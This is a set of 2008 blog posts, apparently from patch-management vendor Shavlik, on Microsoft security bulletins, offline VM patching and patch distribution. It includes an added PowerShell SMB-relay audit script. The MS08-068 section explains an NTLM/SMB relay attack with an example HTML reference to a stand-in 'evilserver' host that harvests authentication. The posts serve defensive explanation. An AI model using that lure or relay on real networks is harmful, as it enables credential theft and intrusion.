An article was posted online today at a tech publication that mentions the Internet Explorer zero-day vulnerability and includes suggestions from unnamed security experts to 'switch to an alternative internet browser, such as Firefox or Google Chrome.' Yes, an unpatched security vulnerability exists in Internet Explorer. Yes, it's being actively exploited on the Internet, and yes, even visiting legitimate websites can lead to compromise*.
No, this isn't very different than previously announced zero day exploits (except we're seeing a wider distribution of the exploit and more machines being hacked). No, the world isn't coming to an end, and no, you don't need to change your browser. ZDNet security bloggers are claiming that Microsoft is on target to release an out-of-band security patch for this IE issue as early as tomorrow (December 17th). When it is released, install the patch. Until then, read the workarounds posted by Microsoft to help protect yourself from this issue. While you're at it, install all the other security patches that may be missing on your system. One unpatched issue on your system is equal to a zero-day flaw that may be exploited on the Internet. Unless you're fully patched, you're not patched at all.

* Hackers are planting the exploit on non-nefarious websites via SQL injection techniques. This means that visiting supposedly safe websites can lead to compromise via this IE flaw. These 'legit' websites have even bigger issues, as this means attackers were able to exploit poor SQL coding practices on these sites, which enables hackers to inject evil code on the websites.

December 2008 patch day

Microsoft has released 8 security bulletins today, 6 of which are rated Critical. However, it's the non-Critical patches that are more interesting this month - we'll get to those in a minute.

Microsoft offline virtual patching not really 'offline'

Microsoft has released an updated version of what they call their 'offline virtual machine servicing tool'. This tool is intended to aid administrators in patching Microsoft Virtual Machines that are currently offline (turned off). Microsoft makes a good case for the need to patch offline VM images - something that Shavlik has been saying for quite a while: "Offline machines do not automatically receive operating system, antivirus, or application updates that would keep them compliant with current IT policy.
An out-of-date virtual machine may pose a risk to the IT environment. If deployed and started, the out-of-date virtual machine might be vulnerable to attack or could be capable of attacking other network resources. Therefore, IT groups must take measures to ensure that offline virtual machines remain up-to-date and compliant."

Microsoft states that their solution can patch the offline images. If you look deeper at their solution, however, you find that this isn't really the case. As Microsoft continues: "At present, these measures involve temporarily bringing the virtual machine online, applying the necessary updates, and then storing it again." Wow. This isn't offline patching. This is called 'online patching'. The Microsoft solution moves the offline image to another server, launches the image (turns it on), has the image check in with a WSUS or SCCM server, performs an online patch assessment and an online patch copy and deployment. When done, it turns the image off and moves it back to the original image repository. How is this offline patching?

Rather than leveraging efficiencies gained from evaluating the offline image, the Microsoft solution requires the administrator to launch each of the VM images, scan them, patch them, and turn them off. This requires CPU and memory for each VM, additional servers, storage, and networks to move and launch the VM in a private network, and more time to launch the VM before it can even be assessed. According to Microsoft's documentation, their solution "brings groups of virtual machines online just long enough for them to receive updates from either System Center Configuration Manager 2007 or Windows Server Update Services. As soon as the virtual machines are up-to-date, the tool returns them to the offline state in the Virtual Machine Manager library." By contrast, the Shavlik solution doesn't require the VM images to be turned on in order to perform a patch assessment.
The Shavlik engine scans the offline image when it is turned off - a true offline solution. Shavlik's scan function doesn't require that the image be moved to another system or network and doesn't require that the image be turned on. This approach saves both time and hardware and allows for scanning a much larger number of images in less time. Additionally, the Shavlik solution can scan and patch many more applications (both Microsoft and third party) than Microsoft's WSUS and SCCM solution.

As an IT administrator, I'd prefer to understand the patch status before I turn on the image. I'd also like to prep all the patches for installation on the image before turning it on. Then, when I do turn on the image, the patches can install right away. By copying the patches to the system when it's offline, we've eliminated the time needed to download the patches to each image after it's turned on. To protect unpatched systems from being hacked when turned on (and before patch installation), the administrator can launch the VM images in a 'network disconnected' state. Once the patches have been installed and the system rebooted, it can be joined back to the network. (Microsoft accomplishes this protection by launching the VM image on a private internal network.) Future versions of Shavlik's solution will automate the 'network disconnection' process when launching the VM image in order to install the patches. Shavlik's solution is unique in the marketplace. I'm not aware of any other solution (aside from VMware's solution, which leverages Shavlik's scan engine) that can truly perform patch assessment and prep deployment against offline VM images.

Reflections on the November 2008 Microsoft patch release

Two security bulletins released today. One Critical, one rated Important. I find the 'Important' bulletin far more interesting this month. From what I can tell, it appears that MS08-068 (Important) is addressing a vulnerability that was first made public 7+ years ago (in 2001).
Sir Dystic, from Cult of the Dead Cow, found a vulnerability in Microsoft Operating Systems that enabled attackers complete access to users' computers. He wrote a utility called SMBRelay to demonstrate the flaw. Microsoft was aware of the issue but didn't issue any security bulletins or patches to correct the behavior. Well, it looks like they've finally seen the light and have addressed this issue via the MS08-068 patch.

To highlight how this works, here's an example: The attacker and the victim are on the same corporate network. The victim's firewall either allows file and printer sharing services to function, and/or the firewall has been turned off. The attacker sends the victim an html email (or convinces them to visit their website) where the html code includes a reference like: <file://evilserver/picture.jpg>. When the victim machine goes to view this html, it attempts to display the 'picture' jpg. To do this, it needs to connect to the evilserver machine over NetBIOS ports. The evilserver machine asks the victim machine to authenticate to it, so it can then serve up the picture.jpg file. The victim machine performs the NTLM challenge-response authentication process in order to connect to evilserver to get this picture file. Whether the authentication succeeds or fails, it's already too late. The evil server now has challenge-response data that it can use to reply back to the victim's machine - allowing the attacker to simply connect to the victim's machine without providing any specific password. The attacker has the same credentials as the user had on their system and can read and write files, modify the registry, delete objects, access emails, etc. I used to demonstrate this attack in classroom training events around the country. It was very eye opening for people to see a very easy-to-use exploit that could result in accessing anyone's computer on their network.
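The relay just described only works when the victim accepts an unsigned SMB session and is reachable on the file-sharing ports. As an added example (not from the original post), this PowerShell audit checks the local machine for the conditions that let the relay succeed: SMB signing not required on the server or client side (the documented RequireSecuritySignature registry values), the Server service listening, and a disabled Windows Firewall profile. It assumes Windows 8 / Server 2012 or later for Get-NetFirewallProfile; the registry and service checks work on older releases too.

```powershell
# Added example, not part of the original post: audit a host for the
# conditions that make an NTLM/SMB relay (the MS08-068 scenario) possible.
# Registry paths are the standard LanmanServer / LanmanWorkstation
# signing settings; a missing value is treated as "not required".

function Get-SmbSigningRequired {
    param([Parameter(Mandatory)][string]$Path)
    $item = Get-ItemProperty -Path $Path -Name 'RequireSecuritySignature' `
                             -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $false }
    return ([int]$item.RequireSecuritySignature -eq 1)
}

function Get-SmbRelayExposure {
    $serverKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
    $clientKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters'
    $findings  = @()

    # 1. SMB signing: with signing required on both ends, a relayed session
    #    cannot be completed because the relay never learns the session key.
    if (-not (Get-SmbSigningRequired $serverKey)) {
        $findings += 'Server-side SMB signing is not required (LanmanServer RequireSecuritySignature != 1).'
    }
    if (-not (Get-SmbSigningRequired $clientKey)) {
        $findings += 'Client-side SMB signing is not required (LanmanWorkstation RequireSecuritySignature != 1).'
    }

    # 2. Server service: the post suggests disabling it on machines that do
    #    not need to share files; without it there is nothing to relay into.
    $srv = Get-Service -Name LanmanServer -ErrorAction SilentlyContinue
    if ($srv -and $srv.Status -eq 'Running') {
        $findings += 'Server service (LanmanServer) is running, so tcp 139/445 are offered to the network.'
    }

    # 3. Host firewall: any disabled profile leaves the NetBIOS ports open to
    #    peers on the same network segment.
    $profiles = Get-NetFirewallProfile -ErrorAction SilentlyContinue
    foreach ($p in $profiles) {
        if ($p.Enabled -ne 'True') {
            $findings += "Windows Firewall profile '$($p.Name)' is disabled."
        }
    }
    return $findings
}

$exposure = Get-SmbRelayExposure
if ($exposure.Count -eq 0) {
    Write-Output 'No SMB relay exposure found on this host.'
} else {
    Write-Output 'SMB relay exposure on this host:'
    $exposure | ForEach-Object { Write-Output " - $_" }
}
```

Run it per host (or wrap Get-SmbRelayExposure in Invoke-Command) to find the machines where the patch, signing or a firewall rule still need to be applied.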
That this had been acknowledged by Microsoft in 2001 but never fixed was an equally eye-opening bit of news for the classroom participants. This is a pretty scary attack that should keep IT managers up at night until it's fully patched. "How do I know I haven't already been hacked with this exploit?" "Who's been accessing my computer without my password?" "Well, you don't really know. Anyone with a computer on a typical corporate network and a copy of Sir Dystic's SMBRelay exploit has probably already been on your computer and you'd never know."

To fix the issue, apply the patch. Or, enable SMB signing on all your NetBIOS communication (something Microsoft recommended in 2001 when this issue was first raised). Or, enable personal firewalls on all machines and disable the Server service. This is certainly another good excuse to block inbound and outbound NetBIOS access at your corporate firewalls if you aren't already.

Regarding MS08-069, this is a Critical vulnerability in the Microsoft MSXML parser that ships both in the OS and in most Office products. Visit the wrong website or open a malicious document and you're hacked. Nuff said. Apply the patch.

Reflections on the October 2008 Microsoft patch release

Lots of security patches released today. Different than most months. In prior months, the majority of the security bulletins addressed 'client-side' vulnerabilities, i.e., those that require user interaction, such as visiting an evil website or opening a malformed document. This month, we had a good number of 'server-side' vulnerabilities. Server-side vulnerabilities are a hacker's best friend. They enable attackers to target a system they'd like to break into and not wait for a user to take an action before the attack can be completed. (In a client-side attack, you also don't have control over who might open the email or visit the site.) The most interesting bulletins this month are in the middle of the pack - MS08-060 through MS08-063.
We'll start with those and then touch on the rest.

MS08-060 'Vulnerability in Active Directory Could Allow Remote Code Execution (957280)' is a Critical issue that impacts Windows 2000 domain controllers. This one is really nasty. Unauthenticated users can send a specially crafted LDAP packet to the Win2K AD server and then do with that server what they wish. Complete Domain Admin access, if they do it correctly. Once you have domain admin access, you can add your own user account, delete user accounts, lock out accounts, access nearly any desktop, laptop or server that is a member of the domain, delete files, install or remove services, or monkey with group policy objects. I'd get this one patched as soon as possible if I had any Windows 2000 DCs on my network. Note, this attack is probably limited to internal networks - as the LDAP and SSL LDAP ports (tcp 389 and tcp 636) are usually blocked at the corporate firewall.

MS08-063 'Vulnerability in SMB Could Allow Remote Code Execution (957095)' is my next favorite one this month. Microsoft calls this one Important, I call it cool. SMB is the protocol that you use to perform file and printer sharing activities on your network - anything from logging in to accessing shared files to sending a document to a printer - it's all SMB. If a disgruntled user connects to a file share on a remote system and renames a specific file in that share in a specific manner (including length), the renamed file will cause code to execute on that file server - thereby enabling the attacker to run code of their choice on that server. This impacts all Operating Systems - Windows 2000 through Windows Server 2008. This attack will be primarily an internal network attack, as the SMB ports (tcp 139 and tcp 445) are usually blocked at the firewall.
MS08-061 'Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (954211)' and MS08-062 'Vulnerability in Windows Internet Printing Service Could Allow Remote Code Execution (953155)' are each rated Important, yet when exploited together, should be considered Critical.

MS08-062 is a flaw in the Internet Printing Service that is present in IIS installations. In this attack, the hacker sends commands to the Internet Printing Service on the target system. The target system responds by connecting to the SMB port (tcp 445) on the hacker's computer to pick up and execute the evil code. The evil code will execute in kernel mode (aka admin rights). The threat is mitigated somewhat, as the attacker must have some level of credentials to the system before they submit the commands to the printer service. It's also unlikely that the IIS server will have outbound SMB access to the hacker's workstation, as outbound SMB traffic should be blocked at the firewall. Exploit code for this issue has been discovered on the Internet.

MS08-061 is a privilege escalation attack. By executing special code on a target server, the attacker can raise their permissions from that of 'user' to a higher level account (like administrator). Envision a shared web server environment, where you (as a user level account) can upload code to a webserver hosted by your ISP. Upload the evil privilege escalation code to the webserver. Once it's posted to your webserver, execute this file via your web browser. The IIS service now has admin level permissions and can do various tasks like dumping out password hashes, reading files, and creating backdoors. This attack impacts all Operating Systems. Microsoft rates this as Important, as it requires that you already have access to upload code to the webserver. Microsoft says that exploit code for this is likely.
A quick review of the other items:

MS08-057: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (956416) is another 'open a malicious document and get hacked' vulnerability that applies to all versions of Excel. Nuff said. (Microsoft says this is Critical and working exploit code is likely.)

MS08-058: Cumulative Security Update for Internet Explorer (956390) is a 'visit an evil website and get hacked' vulnerability. Also known as 'IE patch of the month'. (Microsoft rates this as Critical and says that exploit code is likely. The vulnerability impacting IE on Windows 2000 was previously made public.)

MS08-059: Vulnerability in Host Integration Server RPC Service Could Allow Remote Code Execution (956695) is rated Critical and impacts Host Integration Servers (2000, 2004, 2006) - otherwise known as SNA Servers. An unauthenticated attacker can issue SNA RPC commands to the target system and execute any commands they want on the server. If you have SNA Servers, get them patched right away. If you don't know what SNA Servers are, ignore this one.

MS08-064: Vulnerability in Virtual Address Descriptor Manipulation Could Allow Elevation of Privilege (956841) is an Important patch (as per Microsoft) that could enable 'users' to become 'administrators' on their systems. Similar to MS08-061, but only applies to XP and later systems.

MS08-065: Vulnerability in Message Queuing Could Allow Remote Code Execution (951071) is rated Important by Microsoft, but should be rated Critical (as compared to the MS08-059 Host Integration Server standards). Windows 2000 systems with MSMQ installed can be hacked by anonymous (internal) users by sending an RPC request to the MSMQ Service. The attacker can then do as they please with the target system. Microsoft says code execution is difficult in this attack, and therefore doesn't expect to see any exploit code for this to be released.
MS08-066: Vulnerability in the Microsoft Ancillary Function Driver Could Allow Elevation of Privilege (956803) is an Important bulletin and impacts XP and WS03 systems. Like MS08-064 and MS08-061, this can enable attackers to move from user status to admin status on their systems. Microsoft says exploit code is likely to be released.

Finally, Microsoft released their exploitability index today. This provides Microsoft's take on how difficult an exploit would be to craft, and whether we're likely to see working exploit code for the issue (information gleaned from these ratings is included in the summaries above). While I like the concept of this guide, I couldn't actually find the data. Microsoft didn't include this in the security bulletins themselves, but rather in the monthly security bulletin summary (who reads that?). Microsoft would be well served to include this information in the bulletin itself in future Patch Tuesday releases.

Reflections on the September 2008 Microsoft patch release

All four security bulletins this month are rated Critical, and all four relate to problems when a user visits an evil website (or listens to an audio stream from a malicious website). In other words, focus on patching your end-user machines first rather than the servers in your datacenter. Since these exploits require users to perform actions on their computers, like visiting a website, servers in a datacenter are less prone to be exploited, as users aren't typically browsing the Internet from these servers.

Of the four bulletins released this month, MS08-052 is the most important one to patch first. MS08-052 impacts the graphics engine on Windows XP and later systems. The graphics engine is part of all Operating Systems, and is also included with Microsoft Office and Microsoft SQL Server products, among others. You may need to install multiple patches on your system to address this issue, where each patch updates a different component on your computer.
Unfortunately, Microsoft hasn't made it easy to determine which collection of patches you may need on each system - making it more likely that some systems will go unpatched for some portion of affected products. Also, the security bulletin doesn't make it very clear as to which patches in this bulletin will be patched with WSUS vs. the patches you'll need to install manually.

Bulletins MS08-053 and MS08-054 relate to Windows Media items. 08-053 is an improperly marked ActiveX control that can execute code on your system if you visit an evil website. 08-054 can exploit your system if you're enjoying streaming audio files with Windows Media Player 11. (Maybe cutting edge aint so grand?!)

Finally, MS08-055 is a flaw with URI protocol handling and Microsoft OneNote 2007. Similar in style to the Firefox vs. Microsoft debates from July of 2007, clicking on a hyperlink that has a URL with onenote:// as the protocol may cause code to execute on your machine (you must have OneNote installed on your machine to be vulnerable). Microsoft fixed the "shellexecute" flaw that led to the Firefox debacle (MS07-061) - however, this new onenote:// flaw is slightly different and isn't addressed by the MS07-061 patch.

Reflections on July 2008 Microsoft Patch Day

One could say it's a pretty quiet Microsoft patch release day. Microsoft only released 4 security bulletins, labeling all as Important (none as Critical). Of the four bulletins, one relates to a flaw in Outlook Web Access (OWA) that could allow an attacker to read, create, send, or delete emails on behalf of the unwitting OWA user; patching the Exchange 2003 or 2007 OWA server corrects this. Beware, it's a very large patch.

A second bulletin is specific to SQL Server, and when I say SQL Server, I mean ALL versions of SQL Server. SQL Server 7 through SQL Server 2005, including MSDE and WMSDE installations, are impacted (including WSUS installs running WMSDE).
This vulnerability allows 'authenticated' attackers to potentially access information that they shouldn't be able to access. The bar is set very high for the attacker here - it's not a simple type of exploit that most corporate users could pull off.

A third bulletin relates to just Windows Vista and Windows Server 2008. If a user on one of these systems receives an email with a malicious saved-search file, and opens this file and re-saves it, then evil code may run on their system. Also, if a user visits an evil website where this saved-search file resides, code may be executed on the user's system. It's unclear from Microsoft's bulletin whether the user must download and save the saved-search file to their own system, or if this exploit happens simply by visiting the evil website. Earlier in the bulletin, Microsoft states that a user must "open and save a specially crafted saved-search file with an affected version of Windows Explorer". Then it goes on to say that in a web-based scenario, visiting a malicious website could allow this to happen. Microsoft should really review their bulletins and make it a little more clear (or less confusing) about what actions really trigger this event.

The fourth bulletin this month relates to DNS services - both the DNS server and the DNS client. All Operating Systems other than Vista are impacted. With respect to this issue, attackers can remotely poison a DNS Server or DNS cache with incorrect domain-name-to-IP-address mappings, causing users to surf to erroneous web locations.

The biggest beef I have with this month's group of patch releases is the classification of vulnerabilities that Microsoft has chosen to use. In some cases, it's rather absurd. In the case of MS08-040 (SQL Server), Microsoft calls this 'Important', but the attacker can 'execute code of the attacker's choice'.
Microsoft doesn't label this as 'code execution', but rather as 'escalation of privilege', because the attacker must be an 'authenticated attacker'. Raise of hands - "who's an 'authenticated' hacker"? It sure seems like Microsoft is re-writing their definitions this month. They've downgraded 'code execution' attacks if the attacks happen to come from 'authenticated users'. And it's no longer called 'code execution'; it's called 'privilege escalation'. I can see where Microsoft is coming from, and it's a very rosy side of Redmond. The other bulletins also seem to be downgraded in terms of severity because of what Microsoft believes to be 'additional steps that must be taken and/or limits of what can be done' (my terms). In one case, the vulnerability is downgraded because a user must save a file to their disk (leave it 'Critical' and downplay the likelihood of attack instead) and in another case, the vulnerability is downgraded because the user can only spoof your email, delete your mail, etc. rather than delete other files on your system. Who's Microsoft to say that your email isn't super critical?

Protection against Safari

Microsoft has issued a Security Advisory to alert folks to a security risk if they are running Apple's Safari web browser on a Microsoft system. (www.microsoft.com/technet/security/advisory/953818.mspx) What is the issue? The Safari web browser doesn't prompt users before downloading and saving files to their system. In contrast, both Internet Explorer and Mozilla Firefox prompt users before saving downloaded files to the system. This 'oversight' on Apple's part can put users at risk. Specifically, visiting a malicious website with Safari can cause an unintended download of software to the machine. This software can also be automatically executed on the machine - all without the user's consent. In short - a very bad thing.
While Apple considers adding a 'feature' to prompt users before downloading files, and while Microsoft ponders if it can do anything via a security patch, the best advice is not to use Safari. (Shavlik customers running NetChk Protect can perform a NonBizWare spyware scan to help identify Safari installations and automatically remove them as desired.)

Microsoft Update - Not Up To The Job

This month's release of Microsoft security updates underscores the risk in relying on Microsoft's patch management tools. Specifically, the Microsoft update mechanism found in Windows Update, Microsoft Update, SMS, and SCCM only scans for 75% of the security bulletins released this month. (And within that 75%, these tools don't scan for certain older versions of products, like those running Office 2000 applications.)

MS08-029 addresses a vulnerability in the Microsoft security suite of tools that includes the Microsoft malware engine - Windows Live OneCare, Antigen for Exchange, Windows Defender, and Forefront Client Security, among others. Unfortunately, Windows Update technologies won't tell you which of your systems are vulnerable - much less which systems you have that even run these applications. Users are left on their own to launch these applications and update them. Although these applications "provide built-in mechanisms for automatic detection and deployment of updates", they leave enterprises without the ability to centrally identify their risk, report on their security posture, or have any knowledge about their level of vulnerability to this issue.

Microsoft Update and the WSUS engine were supposed to be the one-stop shop to understand Microsoft patch status across the enterprise. Of course, this assumes that all Microsoft products work with the Microsoft Update engine.
With the advent of the Live product line and the Microsoft security suite, Microsoft seems to believe that these products are 'above' the need to provide central update management capabilities alongside their peer software applications. Security Bulletin MS08-029 discusses a security vulnerability that, while it cannot remotely take over your system, can be used to cause widespread denial of service, or, when combined with other exploits, can be used to enable an attacker to gain additional access to a system (by forcing a reboot, which may in turn aid other exploits in need of a system restart). In either event, I don't want this on my network, and I'd like to know how prevalent these applications are. Until Microsoft can report centrally on the patch management status for all of its applications, I'll stick with my thesis - Microsoft Update is not up to date.

MS08-021 Being Exploited

I don't mean to tell you 'I told you so', but I will. I told you so. As we discussed in the April post patch day webinar, MS08-021 is the most important patch to get installed from the April patch release. eWeek is reporting that an exploit was released in the wild for the graphic image vulnerability a mere 2 days after the patch was released. More info here:

Reflections on April 2008 patch day

All 8 bulletins this month are client-side vulnerabilities. IOW, your system is safe unless a user logs in and opens documents, reads email, or visits an evil website on that computer. Systems where no one logs on and does this (i.e., servers in a data center) are safe. Of the five OS-related vulnerabilities this month, four impact Vista and Windows Server 2008. The most critical to get installed right away are MS08-021, MS08-022, and MS08-024. Of these, MS08-021 is the most important, as it can be exploited by all three attack vectors: visiting an evil website, opening an evil document, or reading an evil email.
MS08-021 is a flaw in the way that image files are processed - an evil graphic file can execute code on your system. This is the third such evil graphic file attack since January of 2006. MS08-022 is a flaw in JScript and VBScript in IE6 and earlier versions of IE. Visit an evil website and you'll get hacked. This is the patch that was delayed from the January release cycle. MS08-024 is a flaw in all versions of IE - visit an evil website and you'll get hacked.

MS08-025 is a privilege escalation vulnerability that can allow a user to elevate themselves from user to admin. This can also be exploited by any of the other vulnerabilities announced this month. IOW, visit an evil website and it can execute code on your system to make you an admin - then the evil website can do anything on your system that it wants. IOW, from what I can tell, this vulnerability erases the mitigation that MS provides for all of the earlier patches above: 'the evil code will only execute with the permissions of the logged on user - therefore you are safer if you are logged on with a non-administrative account.'

Supporting Virtualization

I'm really excited to talk about one of our upcoming features - specifically, support for virtualization. Shavlik already supports patch and configuration management for virtual systems on your network. A running virtual system is just like a real system to Shavlik NetChk Protect and NetChk Compliance (now NetChk Configure). You can scan and patch these virtual systems today to ensure that your running VMs are protected. Now Shavlik is taking things to the next level. Upcoming releases of Shavlik NetChk Protect will enable you to scan and patch OFFLINE virtual images. Offline images are those that aren't currently powered on. You may have hundreds of offline virtual images in your VM repository - these VMs are powered on for hours or days and may be powered off again until the next month when they are needed.
It's important to ensure that these systems are patched as soon as they are brought online, else you place your network at risk from these unpatched systems. Shavlik NetChk Protect makes it easy to patch these systems. Simply reference the offline image or folder of images in a NetChk machine group and perform a scan like usual. The Protect scan engine will perform a full patch assessment of each image, and results are displayed alongside results for running systems (you'll be able to differentiate images from running systems in the results view). Patching these offline images is similarly simple. Highlight the images and patches you'd like to install and select 'deploy' from the Shavlik menu. The patches will be copied to the offline images and will be installed the moment that the virtual image is started (or according to its scheduled deployment time). What's really nice about this feature is the ability to patch not only the VM images that you know about (ESX SAN drive, folder of MS Virtual Server images, etc.) but also to scan desktops and servers for the presence of VMware Workstation, VMware Server, and Microsoft Virtual PC images. Additional information about the offline virtual scanning and patching functions is available in Shavlik Knowledge Base Article SKB 5788.

Speeding up agentless deployment with distribution servers

I thought I'd take this time to share an idea that might help you speed up the agentless patch deployment process. Turns out, some work we did to support agent-based deployments can provide a big benefit for agentless deployments. In a standard agentless deployment, the NetChk console pushes each patch or group of patches to each remote system. If there are two patches to push to each of 1,000 systems, the console will push 2,000 patches total. The console can push to 64 machines simultaneously - so it may take some time to push out all of the patches to all of the machines.
The patch push can also consume a lot of network bandwidth, especially if pushing patches to a large number of systems across a slow link. We can address both speed and bandwidth issues for agentless deployments via the use of distribution servers. The term 'distribution server' is really a misnomer. It's not really a server at all. Instead, a distribution server is simply a UNC file share or a web share on a workstation or server machine.

Let's start with the simple scenario: use the NetChk console as a distribution server. On the NetChk console, share out the C:\Program Files\Shavlik Technologies\NetChk\Patches\en-us (or similar) folder with read-only permissions for a specific NetChk patch user account. This 'share' is your distribution server.

Next, go to Tools - Distribution Servers to define the distribution server share you just created. Select New on the Servers tab and then select the UNC radio button. Enter the UNC path to the share (ex. \\console\patchrepository) and the username and password for the account that has read-only access to this share (don't worry, this password info is encrypted). There's no need to enter synchronization data at the bottom of this window because the console patch repository is the same location as the distribution server share.

On the IP Ranges tab of the distribution server window, create an IP range for your network. If you want all of your machines to use the same distribution server, you may enter 0.0.0.0 - 255.255.255.255. Assign the distribution server you just created to this IP range.

Finally, go to the deployment template that you'd like to use and select the Distribution Servers tab. Check the box to deploy patches using distribution servers. Set the randomization number of minutes (if desired) and also decide if you want the target systems to download the patches from the vendor websites directly if the machines can't contact the distribution server. Here is where the magic happens.
When you go to deploy patches using this deployment template, the patches won't be pushed to each system. Instead, the NetChk console will push a very small deployment instruction set to each machine (and the Shavlik Scheduler, if not already present) and will schedule that instruction set to execute at the scheduled deployment time. When this deployment time occurs, the system will realize that it doesn't have the necessary patches to deploy, it will read the instruction set to obtain the distribution server information, and it will then log in to the distribution server and download the specified patches.

The above process will speed up the deployment process; however, the overall bandwidth hit against the network will be the same as if the console was doing a normal patch push. To conserve bandwidth and better handle remote sites, consider the following:

Create one distribution server at each remote site. This can be the UNC-style distribution server we created above, or an http or https website at each remote site. The distribution server UNC or web share can reside on workstation- or server-class machines - whatever is 'always available' at the remote site. (Keep in mind that workstation-class machines may only support ten concurrent sessions for UNC and web connections.)

When defining the distribution servers, create groups of IP addresses - one group for each remote site - and assign the IP ranges to the distribution server at that site. This will ensure that the machines at remote site A will download their patches over the local area network from the distribution server at site A, thus reducing your network bandwidth over the slow link back to the NetChk console.

Make sure to run the distribution server sync function to ensure that the remote distribution servers have a full copy of the patches from the console.
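As an added example (my own sketch, not Shavlik's code and not how the NetChk console implements it), here is a small Python model of the IP-range-to-distribution-server assignment just described. It picks the share each target machine will pull from, honours the "download from the vendor if the distribution server is unreachable" option, and tallies how much of the patch payload crosses the console's own network link, contrasting the console-only share assigned to 0.0.0.0 - 255.255.255.255 with one share per remote site. The server names, share paths, IP ranges, target addresses and patch sizes are all constructed, and the accounting (one sync copy per remote share, one download per machine served by the console share) is an assumption about where the bytes flow, not a statement of how NetChk meters traffic.

```python
"""Added example, not Shavlik's code: model the IP-range-to-distribution-server
assignment for an agentless deployment and count the megabytes that cross the
console's link. All names, shares, ranges, sizes and addresses are constructed."""
from dataclasses import dataclass, field
from ipaddress import IPv4Network, ip_address, summarize_address_range
from typing import Dict, List, Optional


def ip_range(first: str, last: str) -> List[IPv4Network]:
    """Turn a first-last range as typed into the IP Ranges tab (for example
    0.0.0.0 - 255.255.255.255) into the CIDR networks covering exactly that range."""
    return list(summarize_address_range(ip_address(first), ip_address(last)))


@dataclass
class DistributionServer:
    name: str
    share: str                                   # UNC share or http(s) URL (constructed)
    ranges: List[IPv4Network] = field(default_factory=list)
    at_console: bool = False                     # True when the share is the console's own repository


def select_server(target_ip: str,
                  servers: List[DistributionServer]) -> Optional[DistributionServer]:
    """Return the first distribution server whose assigned IP ranges contain the target."""
    addr = ip_address(target_ip)
    for server in servers:
        if any(addr in net for net in server.ranges):
            return server
    return None


def plan_deployment(targets: List[str], patch_sizes_mb: List[int],
                    servers: List[DistributionServer], vendor_fallback: bool) -> Dict:
    """Report how many targets pull from each server, which targets match no range
    (vendor download if the fallback is enabled, otherwise unreachable), and the
    megabytes that cross the console's network link (assumed accounting)."""
    payload = sum(patch_sizes_mb)
    plan = {"console_link_mb": 0,
            "per_server": {s.name: 0 for s in servers},
            "vendor": [], "unreachable": []}
    # Sync step: each remote share receives one copy of the patches from the console,
    # regardless of how many machines sit behind it.
    plan["console_link_mb"] += payload * sum(1 for s in servers if not s.at_console)
    for ip in targets:
        server = select_server(ip, servers)
        if server is None:
            (plan["vendor"] if vendor_fallback else plan["unreachable"]).append(ip)
            continue
        plan["per_server"][server.name] += 1
        if server.at_console:
            # Machines served by the console share download across the console's link.
            plan["console_link_mb"] += payload
    return plan


# Constructed sample data: two 10 MB patches, three machines at site A,
# two at site B, and one stray machine outside every defined range.
PATCH_MB = [10, 10]
TARGETS = ["10.1.0.5", "10.1.0.6", "10.1.0.7", "10.2.0.5", "10.2.0.6", "192.168.5.7"]

CONSOLE_ONLY = [DistributionServer("console", r"\\console\patchrepository",
                                   ip_range("0.0.0.0", "255.255.255.255"), at_console=True)]
PER_SITE = [DistributionServer("siteA", r"\\siteA-fs\patches",
                               ip_range("10.1.0.0", "10.1.255.255")),
            DistributionServer("siteB", "https://siteB-web/patches",
                               ip_range("10.2.0.0", "10.2.255.255"))]

if __name__ == "__main__":
    print("console only:", plan_deployment(TARGETS, PATCH_MB, CONSOLE_ONLY, vendor_fallback=True))
    print("per site:    ", plan_deployment(TARGETS, PATCH_MB, PER_SITE, vendor_fallback=True))
```

With the console as the only share, every machine's download rides the console link (6 machines x 20 MB = 120 MB in the sample); with one share per site the link carries only the two sync copies (40 MB) and the stray machine falls back to the vendor site or is reported as unreachable, which is the case to watch for when an IP range is mistyped. The model does not represent the ten-concurrent-session ceiling of a workstation-class share, so size remote shares accordingly.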
The above process is a unique method to leverage distribution servers (normally reserved for agent-based deployments) to aid in the speed and network bandwidth utilization when performing agentless deployments.

Reflections on March 2008 Patch Day

It's an all Office patch day today. More to the point, an all Excel day. Nine of the twelve vulnerabilities addressed this month relate to Microsoft Excel. The twelve vulnerabilities were encapsulated in 4 security bulletins - each one patching an Office-related client-side vulnerability. Order of importance to patch for the month: MS08-015, MS08-014, MS08-016, MS08-017.

MS08-014
MS08-015